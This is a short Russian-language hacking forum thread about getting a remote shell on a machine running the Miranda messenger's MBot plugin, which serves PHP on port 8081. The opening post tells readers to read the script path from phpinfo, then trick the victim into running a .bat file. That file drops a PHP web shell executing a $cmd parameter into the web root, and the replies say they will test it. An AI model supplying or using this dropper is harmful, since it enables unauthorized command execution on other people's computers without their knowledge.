|
Получение шелла через MBot
Получение шелла через MBot
Теория MBot - сервисный плагин Миранды, позволяющий писать скрипты на PHP как плагины для Миранды. Он включает веб сервер на 8081 порту. В WWW каталоге размещаеться только 1 файл index.php с результатом работы phpinfo(). Толку нам от него мало. Вот если бы можно было писать в файл... Практика Получаеться когда включаеться Миранда, одновременно запускаеться веб-сервер. Если юзер об этом не знает можно попробовать получить веб-шелл на тачке. Просмотрев файл index.php через браузер можно узнать путь к скрипту. Например D:/Miranda/MBot/WWW/index.php Теперь нужно заставить жертву создать файл, который будет содержать шелл Я сделал такой .bat файл Код:
echo "<?='<pre>'.convert_cyr_string(htmlspecialchars(`$cmd`),'d','w').'</pre>'?>" > D:/Miranda/MBot/WWW/test.php |
Щас протестим! Теоритический ты убедил, а вот щас посмотрим на практике!
|
ну что получается у кого нить такая фишка.
|
| Время: 00:33 |